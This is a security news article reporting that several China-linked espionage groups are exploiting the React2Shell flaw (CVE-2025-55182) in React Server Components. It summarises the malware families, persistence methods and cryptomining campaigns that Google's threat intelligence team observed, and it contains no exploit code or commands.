At least five Chinese cyber-espionage groups are actively exploiting a critical React vulnerability, known as React2Shell, to gain initial access to victim networks, Google’s threat analysis team said.
The flaw, a critical unauthenticated remote code execution issue in React Server Components tracked as CVE-2025-55182, was publicly disclosed on Dec. 3, 2025. Since then, React2Shell has been actively exploited by multiple threat actors for reconnaissance and to deploy various malware families. Observed payloads include cryptominers, the PeerBlight Linux backdoor, the CowTunnel reverse-proxy tunnel, the Go-based ZinFoq implant, and a Kaiji botnet variant.
Researchers report a surge in opportunistic attacks primarily targeting internet-exposed Next.js applications and containerized workloads in Kubernetes and managed cloud environments. Cloudflare notes that attackers are profiling potential victims by gathering application metadata, such as icon hashes, SSL certificate details, and regional identifiers, before exploiting the flaw. Alongside the React2Shell issue, two RSC-related vulnerabilities (CVE-2025-55183 and CVE-2025-55184) were also disclosed, both linked to RSC payload handling and Server Function behavior. The flaws are not related to React2Shell.
Google Threat Intelligence Group (GTIG) says that multiple threat clusters are leveraging the vulnerability to deploy a range of malicious tools, including the MINOCAT tunneler, SNOWLIGHT downloader, HISONIC and COMPOOD backdoors. The threat actors tracked by Google include UNC6600, UNC6586, UNC6588, UNC6595, and UNC6603, all linked to China-nexus operations targeting organizations worldwide that run unpatched versions of React and Next.js.
In one campaign, UNC6600 exploited React2Shell to deliver the MINOCAT tunneler, using scripts to establish persistence via cron jobs, systemd services, and shell configuration files. UNC6586 was observed deploying the SNOWLIGHT downloader, part of the publicly available VSHELL backdoor, while UNC6588 downloaded the COMPOOD backdoor with no further follow-on activity observed. UNC6603 deployed an updated HISONIC backdoor that abuses legitimate cloud services for command-and-control, and UNC6595 used the vulnerability to install ANGRYREBEL.LINUX malware disguised as the OpenSSH daemon.Google said Amazon Web Services has also observed exploitation by China-nexus groups Earth Lamia, tracked by GTIG as UNC5454, and Jackpot Panda.
GTIG observed multiple incidents beginning December 5 in which threat actors exploited CVE-2025-55182 to deploy the XMRig cryptocurrency miner for illicit mining. In one attack chain, an actor downloaded a shell script named sex.sh, which retrieved and executed XMRig from GitHub and attempted to establish persistence by creating a new systemd service called system-update-service. GTIG has also observed extensive discussion of CVE-2025-55182 on underground forums, where actors shared scanning tools, proof-of-concept code, and their experience using these tools.